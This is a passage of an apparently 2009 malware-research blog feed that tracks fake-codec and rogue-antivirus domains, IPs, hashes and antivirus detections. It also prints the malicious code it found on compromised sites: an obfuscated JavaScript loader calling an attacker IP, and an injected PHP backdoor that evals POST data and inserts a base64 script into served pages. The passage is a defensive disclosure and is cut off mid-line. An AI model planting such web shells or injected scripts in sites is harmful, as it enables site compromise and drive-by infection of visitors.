style="color:#FF0000"&gt;DNSChanger.r&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Associated website: &lt;br /&gt;&lt;br /&gt;trafficstatic.com [92.48.91.144]&lt;br /&gt;statsanalist.cn [72.233.114.126]&lt;br /&gt;livefind1blogging.com [72.233.115.169]&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;The new list is as follow (including sub-domains):&lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;iloveyourbrain.com&lt;br /&gt;loyal-tube.com&lt;br /&gt;loyaldown99.com&lt;br /&gt;loyaltube.com&lt;br /&gt;loyaltube09.com&lt;br /&gt;loyaltube10.com&lt;br /&gt;rakompoporyadkunazaryadku.com&lt;br /&gt;ruler-domains.com&lt;br /&gt;setupdatdownload.com&lt;br /&gt;tube-loyal.com&lt;br /&gt;tubeloyal.com&lt;br /&gt;tubeloyaln.com&lt;br /&gt;billingpayment.netcodecs.tubeloyaln.com  &lt;br /&gt;lamer.tubeloyaln.com  &lt;br /&gt;videosz.tubeloyaln.com&lt;br /&gt;wedare.tubeloyaln.com&lt;br /&gt;velzevuladmin.com &lt;br /&gt;win-pc-defender.com&lt;br /&gt;winpcdown09.com&lt;br /&gt;winpcdown99.com&lt;br /&gt;xp-police-09.com&lt;br /&gt;xp-police-2009.com&lt;br /&gt;xp-police-antivirus.com&lt;br /&gt;xp-police-av.com&lt;br /&gt;xp-police-engine.com&lt;br /&gt;xp-police.com&lt;br /&gt;gofuckbiz.xp-police.com &lt;br /&gt;lamer.xp-police.com &lt;br /&gt;suckmydick.xp-police.com&lt;br /&gt;rulerteam.xp-police.com&lt;br /&gt;sigurd.xp-police.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;DNS:&lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;ns1.loyaltube10.com&lt;br /&gt;ns1.tube-loyal.com&lt;br /&gt;ns1.tubeloyal.com&lt;br /&gt;ns1.winpcdown09.com&lt;br /&gt;ns1.winpcdown99.com&lt;br /&gt;ns1.xp-police.com&lt;br /&gt;ns2.loyaltube10.com&lt;br /&gt;ns2.tube-loyal.com&lt;br /&gt;ns2.tubeloyal.com&lt;br /&gt;ns2.winpcdown09.com&lt;br /&gt;ns2.winpcdown99.com&lt;br /&gt;ns2.xp-police.com&lt;br /&gt;ns3.xp-police.com&lt;br /&gt;ns4.xp-police.com&lt;br /&gt;ns5.xp-police.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;IP: 213.163.65.10&lt;br /&gt;Reverse: mail.l1ght.net&lt;br /&gt;Route: 213.163.64.0/19&lt;br /&gt;AS:AS20495 - WEDARE We Dare BV Autonomous System&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;    &lt;tr&gt;      &lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Analysis:&lt;/b&gt;&lt;/td&gt;    &lt;/tr&gt;    &lt;tr&gt;      &lt;td width="25" height="208" valign="top"&gt;&lt;br /&gt;&lt;/td&gt;      &lt;td width="547"&gt;&lt;br /&gt;&lt;table width="524" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Site URLs&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://tubeloyaln.com/scan/?id=..&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://tubeloyaln.com/tube/?id=197&amp;amp;title=adult+movie&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://tubeloyaln.com/codec/.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://wincodecupdate.com/codec/.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="20"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="144"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;codec.exe&lt;/td&gt;&lt;td width="18"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td colspan="2"&gt;107010 bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td colspan="2"&gt;e66fb67721bcb6a6b47879e451ce905b&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=e66fb67721bcb6a6b47879e451ce905b" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.virustotal.com/analisis/639b3f0ab92bf9fcbea9c6dd6d9eb43a" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Anubis&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1dae68d4e19b12db48995ce91fe940de0" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td colspan="2"&gt;&lt;span id="status_fecha2"&gt;04.05.2009 06:39:41 (CET)&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td colspan="2"&gt;6/40 (15%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;FakeAlert.IR&lt;/span&gt;&lt;/td&gt;&lt;td&gt;AVG&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="185"&gt;&lt;span style="color:#FF0000"&gt;(Suspicious) - DNAScan&lt;/span&gt;&lt;/td&gt;&lt;td width="157"&gt;CAT-QuickHeal&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious File&lt;/span&gt;&lt;/td&gt;&lt;td&gt; eSafe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Downloader-BON&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Downloader-BON&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee+Artemis&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="185"&gt;&lt;span style="color:#FF0000"&gt;TrojanDropper:Win32/Insebro.A&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Microsoft&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Malware-Cryptor.Win32.Zorq&lt;/span&gt;&lt;/td&gt;&lt;td&gt;VBA32&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;/td&gt;    &lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Network graph&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="208" valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdhDq37L6sI/AAAAAAAAAXA/2l7b8eHyVyQ/s1600-h/tubeloyaln.com-fake-codec-213.163.65.10.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 82px; height: 320px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdhDq37L6sI/AAAAAAAAAXA/2l7b8eHyVyQ/s320/tubeloyaln.com-fake-codec-213.163.65.10.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321077363584002754" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-7251306043532627424?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/7251306043532627424'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/7251306043532627424'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/tubeloyalncom-fake-codec-and-rogueav.html' title='tubeloyaln.com Fake Codec and RogueAV Revisited'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6-7cbL0RI/AAAAAAAAAQI/C7I674PhTLE/s72-c/loyaltube09.com-FakeScanner.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-6444620241046296227</id><published>2009-04-03T11:28:00.000-07:00</published><updated>2009-04-19T17:00:56.872-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='hack website'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='zlkon'/><category scheme='http://www.blogger.com/atom/ns#' term='fake av'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='rbn'/><category scheme='http://www.blogger.com/atom/ns#' term='javascript exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='web poisoning'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue av'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe trojans'/><title type='text'>Black Hat SEO and Rogue Antivirus p.5</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="572" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO planting trojans&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;  Full of hacks&lt;br /&gt;&lt;/p&gt;&lt;table width="549" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="549"&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;Follow this page for desinfection: &lt;a href="http://blog.scansafe.com/journal/2009/4/14/malware-manipulating-google-serps.html" target="_blank"&gt;Malware Manipulating Google SERPs&lt;/a&gt; (from blog.scansafe.com)&lt;p&gt;  After promoting some spyware and other rogue security software, now this is another list of compromised websites all  with obfuscated javascript code inserted which result in:&lt;br /&gt;  &lt;br /&gt;  hxxp://94.247.2.195/news/?id=100&lt;br /&gt;  (&lt;a href="http://jsunpack.jeek.org/dec/go?url=94.247.2.195_news__id=100" target="_blank"&gt;Analysis&lt;/a&gt;) &lt;br /&gt;  &lt;br /&gt;  which call &lt;br /&gt;  &lt;br /&gt;  hxxp://94.247.2.195/news/?id=2&lt;br /&gt;  &lt;br /&gt;  and download a PDF with a random name QRB.pdf, WXk.pdf ...&lt;br /&gt;  &lt;br /&gt;  File size: 10417 bytes&lt;br /&gt;  MD5: af28f3bc9424a3da7ff8bc84740bce93 &lt;br /&gt;  &lt;br /&gt;  &lt;a href="http://www.virustotal.com/analisis/6a54baeba7d05c80bc4316ad3b294f86" target="_blank"&gt;VirusTotal Analysis&lt;/a&gt;: 0/40 (0%)&lt;br /&gt;  &lt;br /&gt;  when running it load &lt;br /&gt;  &lt;br /&gt;  hxxp://94.247.2.195/news/?id=10&amp;amp;&lt;br /&gt;  &lt;br /&gt;  With an Adobe Collab overflow (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659" target="_blank"&gt;CVE-2007-5659&lt;/a&gt;)  &lt;br /&gt;  &lt;a href="http://wepawet.iseclab.org/view.php?hash=af28f3bc9424a3da7ff8bc84740bce93&amp;amp;type=js" target="_blank"&gt;Wepawet Analysis&lt;/a&gt;&lt;br /&gt;  &lt;br /&gt;  &lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdZV8fn9CeI/AAAAAAAAAV4/m8RiK0R6vno/s1600-h/PDF1.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 223px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdZV8fn9CeI/AAAAAAAAAV4/m8RiK0R6vno/s320/PDF1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320534507554408930" /&gt;&lt;/a&gt;&lt;br /&gt;  &lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdZV8uEKXkI/AAAAAAAAAWA/bkfPpHtdVRs/s1600-h/PDF2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 245px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdZV8uEKXkI/AAAAAAAAAWA/bkfPpHtdVRs/s320/PDF2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320534511430819394" /&gt;&lt;/a&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdZV8fn9CeI/AAAAAAAAAV4/m8RiK0R6vno/s1600-h/PDF1.jpg"&gt;&lt;/a&gt;&lt;br /&gt;  &lt;br /&gt;which lead to an executable beeing downloaded and executed.&lt;br /&gt;
  Also with a random name PO.exe, 8lv.exe ...&lt;br /&gt;  &lt;br /&gt;  File Size: 15360 Bytes  &lt;br /&gt;  MD5: 791509d03706cbc8883536b5131341d4&lt;br /&gt;  &lt;br /&gt;  &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1890669b0bd937574e5be45e24c63ea80&amp;amp;format=html" target="_blank"&gt;Anubis Report&lt;/a&gt;&lt;br /&gt;  &lt;br /&gt;  &lt;a href="http://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a" target="_blank"&gt;VirusTotal Analysis&lt;/a&gt;: 10/40 (25%)&lt;br /&gt;  &lt;br /&gt;  a-squared - Trojan-Spy.Agent!IK &lt;br /&gt;  Avast - Win32.Daonol-L&lt;br /&gt;  eSafe - Suspicious File  &lt;br /&gt;  GData - Win32:KillAV-KS &lt;br /&gt;  Irakus -   Trojan-Spy.Agent&lt;br /&gt;  Kaspersky -   Backdoor.Win32.Agent.afhg&lt;br /&gt;  McAfee+Artemis  - Generic!Artemis&lt;br /&gt;  Prevx1 - High Risk Cloaked Malware&lt;br /&gt;  Sophos - Mal/Generic-A&lt;br /&gt;  TrendMicro - PAK_Generic.001  &lt;br /&gt;&lt;br /&gt;  First received on 04.03.2009 18:36:21 (CET) &lt;br /&gt;  &lt;br /&gt;  Ikarus: Trojan-Spy.Agent (Sig-Id:975847)  &lt;br /&gt;  &lt;br /&gt;  &lt;a href="http://www.threatexpert.com/report.aspx?md5=791509d03706cbc8883536b5131341d4" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;  &lt;a href="http://info.prevx.com/aboutprogramtext.asp?PX5=553B1FA200AA99603C6800E34911BA008604CE7A" target="_blank"&gt;Prevx&lt;/a&gt;&lt;br /&gt;  &lt;br /&gt;  Source:&lt;br /&gt;  &lt;br /&gt;  &lt;a href="http://discussion.dreamhost.com/showthreaded.pl?Cat=&amp;amp;Board=forum_troubleshooting&amp;amp;Number=117798&amp;amp;page=4&amp;amp;view=expanded&amp;amp;sb=6&amp;amp;o=14&amp;amp;vc=1" target="_blank"&gt;dreamhost.com discussion&lt;/a&gt;&lt;br /&gt;  &lt;a href="http://www.dynamicdrive.com/forums/showthread.php?p=191051" target="_blank"&gt;dynamicdrive.com forum&lt;/a&gt;&lt;br /&gt;  &lt;a href="http://www.windowsbbs.com/malware-virus-removal/82784-js-script-juliet.html" target="_blank"&gt;windowsbbs.com forum&lt;/a&gt; &lt;br /&gt;  &lt;a href="http://www.spywarewarrior.com/viewtopic.php?t=30508" target="_blank"&gt;spywarewarrior.com forum&lt;/a&gt; &lt;br /&gt;  &lt;a href="http://www.who-is-who-in-gpt.com/forum/index.php?showtopic=10478" target="_blank"&gt;who-is-who-in-gpt.com&lt;/a&gt; &lt;br /&gt;  &lt;a href="http://www.tcheval.net/forum/s3071-regle-tcheval-net-victime-hack.html" target="_blank"&gt;tcheval.net forum (FR)&lt;/a&gt;&lt;br /&gt;&lt;hr /&gt;  Also interesting on this IP is this script:&lt;br /&gt;  &lt;br /&gt;  If you have this code in your site, you are probably on of these victims. &lt;br /&gt;Change all your passwords, including FTP, emails etc. On all your accounts.&lt;br /&gt;  &lt;br /&gt;  94.247.2.195/jquery.js &lt;br /&gt;  or&lt;br /&gt;  78.110.175.249/jquery.js (not responding) in Russia&lt;br /&gt;  &lt;br /&gt;descr: LIMIT SUREHOST - AAS188-RIPE - @ukservers.com&lt;br /&gt;person: Alexander A Solovyov - @limt.ru&lt;br /&gt;LIMT Group Ltd. has zero web presence, apart from SPAM, hacking and other problems.&lt;br /&gt;They are clearly a bogus company. Clear evidence of criminal fraud. &amp;quot;Same for LIMIT SUREHOST&amp;quot;&lt;br /&gt;&lt;br /&gt;route: 78.110.160.0/20 - UK Dedicated Servers Limited - AS42831  - UKSERVERS-MNT&lt;br /&gt;  &lt;br /&gt;  Javascript code:&lt;br /&gt;  &lt;br /&gt;  &amp;lt;script language=javascript&amp;gt;&lt;br /&gt;  document.write(unescape('&lt;br /&gt;  %3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl6&lt;br /&gt;  1Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXsz&lt;br /&gt;  AnczAnrHY8iprLtzAn%3E&lt;br /&gt;  ').&lt;br /&gt;  replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,&amp;quot;&amp;quot;));&lt;br /&gt;  &amp;lt;/script&amp;gt; &lt;br /&gt;&lt;br /&gt;  Script found on compromised  websites all for the benefit of the&lt;br /&gt;  infamous &lt;a href="http://en.wikipedia.org/wiki/Russian_Business_Network" target="_blank"&gt;Russian Business Network&lt;/a&gt; (RBN).&lt;br /&gt;&lt;br /&gt; PHP code injected&lt;br /&gt;&lt;br /&gt;&amp;lt;?php &lt;br /&gt;if (!function_exists('tmp_lkojfghx')) { &lt;br /&gt;for ($i = 1; $i &amp;lt; 10; $i++) &lt;br /&gt;if (is_file($f = '/tmp/m' . $i)) { &lt;br /&gt;include_once($f); &lt;br /&gt;break; &lt;br /&gt;} &lt;br /&gt;if (isset($_POST['tmp_lkojfghx3'])) &lt;br /&gt;eval($_POST['tmp_lkojfghx3']); &lt;br /&gt;if (!defined('TMP_XHGFJOKL')) &lt;br /&gt;define('TMP_XHGFJOKL', base64_decode('PHNjcmlwdCBsYW5&lt;br /&gt;ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaX&lt;br /&gt;RlKHVuZXNjYXBlKCdyYzYlM0Nla2JzMndjcmlJaXAyd3QlMjBzMFM&lt;br /&gt;wcmMlM0QlMkYlMkY3SFh6OCUyRTBTMDEydzEwSFh6JTJFcm&lt;br /&gt;M2MXJON0hYejVEdSUyRXJOMjRla2I5JTJGMndqcmM2cUlpdW&lt;br /&gt;VyZWtieWVrYiUyRXJjNmpyYzZzJTNFMFMwJTNDMnclMkZzYzB&lt;br /&gt;TMHJIWHppcGVrYnQlM0UnKS5yZXBsYWNlKC9yYzZ8MFMwfE&lt;br /&gt;lpfER1fGVrYnxyTnwyd3xIWHovZywiIikpOwogLS0+PC9zY3Jp&lt;br /&gt;cHQ+')); &lt;br /&gt;function tmp_lkojfghx($s) &lt;br /&gt;{ &lt;br /&gt;if ($g = (bin2hex(substr($s, 0, 2)) == '1f8b')) &lt;br /&gt;$s = gzinflate(substr($s, 10, -8)); &lt;br /&gt;if (preg_match_all('#&amp;lt;script(.*?)&amp;lt;/script&amp;gt;#is', $s, $a)) &lt;br /&gt;foreach ($a[0] as $v) &lt;br /&gt;if (count(explode(&amp;quot;\n&amp;quot;, $v)) &amp;gt; 5) { &lt;br /&gt;$e = preg_match('#[\'&amp;quot;][^\s\'&amp;quot;\.,;\?!\[\]:/&amp;lt;&amp;gt;\(\)]{30,}#', $v)&lt;br /&gt;|| preg_match('#[\(\[](\s*\d+,){20,}#', $v); &lt;br /&gt;if ((preg_match('#\beval\b#', $v) &amp;amp;&amp;amp;&lt;br /&gt; ($e || strpos($v, 'fromCharCode'))) ||&lt;br /&gt;($e &amp;amp;&amp;amp; strpos($v, 'document.write'))) &lt;br /&gt;$s = str_replace($v, '', $s); &lt;br /&gt;} &lt;br /&gt;$s1 = preg_replace('#&amp;lt;script language=javascript&amp;gt;&lt;br /&gt;&amp;lt;!-- \ndocument\.write\(unescape\(&amp;quot;.+?\n --&amp;gt;&amp;lt;/script&amp;gt;#', '', $s); &lt;br /&gt;if (stristr($s, '&amp;lt;body')) &lt;br /&gt;$s = preg_replace('#(\s*&amp;lt;body)#mi', TMP_XHGFJOKL . '\1', $s1); &lt;br /&gt;elseif (($s1 != $s) || stristr($s, '&amp;lt;/body') || stristr($s, '&amp;lt;/title&amp;gt;')) &lt;br /&gt;$s = $s1 . TMP_XHGFJOKL; &lt;br /&gt;return $g ? gzencode($s) : $s; &lt;br /&gt;} &lt;br /&gt;function tmp_lkojfghx2($a = 0, $b = 0, $c = 0, $d = 0) &lt;br /&gt;{ &lt;br /&gt;$s = array(); &lt;br /&gt;if ($b &amp;amp;&amp;amp; $GLOBALS['tmp_xhgfjokl']) &lt;br /&gt;call_user_func($GLOBALS['tmp_xhgfjokl'], $a, $b, $c, $d); &lt;br /&gt;foreach (@ob_get_status(1) as $v) &lt;br /&gt;if (($a = $v['name']) == 'tmp_lkojfghx') &lt;br /&gt;return; &lt;br /&gt;else &lt;br /&gt;$s[] = array($a == 'default output handler' ? false : $a); &lt;br /&gt;for ($i = count($s) - 1; $i &amp;gt;= 0; $i--) { &lt;br /&gt;$s[$i][1] = ob_get_contents(); &lt;br /&gt;ob_end_clean(); &lt;br /&gt;} &lt;br /&gt;ob_start('tmp_lkojfghx'); &lt;br /&gt;for ($i = 0; $i &amp;lt; count($s); $i++) { &lt;br /&gt;ob_start($s[$i][0]); &lt;br /&gt;echo $s[$i][1]; &lt;br /&gt;} &lt;br /&gt;} &lt;br /&gt;} &lt;br /&gt;if (($a = @set_error_handler('tmp_lkojfghx2')) != 